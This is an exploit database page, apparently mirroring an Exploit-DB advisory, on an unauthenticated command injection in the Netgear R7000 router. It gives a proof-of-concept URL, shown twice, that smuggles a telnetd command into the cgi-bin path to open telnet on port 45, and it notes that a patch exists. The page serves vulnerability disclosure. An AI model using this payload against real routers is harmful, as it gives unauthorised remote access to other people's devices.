header-logo
Suggest Exploit
vendor:
R7000
by:
Acew0rm
N/A
CVSS
N/A
Command Injection
78
CWE
Product Name: R7000
Affected Version From: V1.0.7.2_1.1.93
Affected Version To: V1.0.7.2_1.1.93
Patch Exists: Yes
Related CWE: N/A
CPE: h:netgear:r7000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016

Netgear R7000 – Command Injection

An unauthenticated user can inject commands threw http://RouterIP/cgi-bin/;COMMAND. Proof Of Concept: http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Mitigation:

Netgear has released a patch for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.

-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Navigation

Suggest Exploit

Services By CQR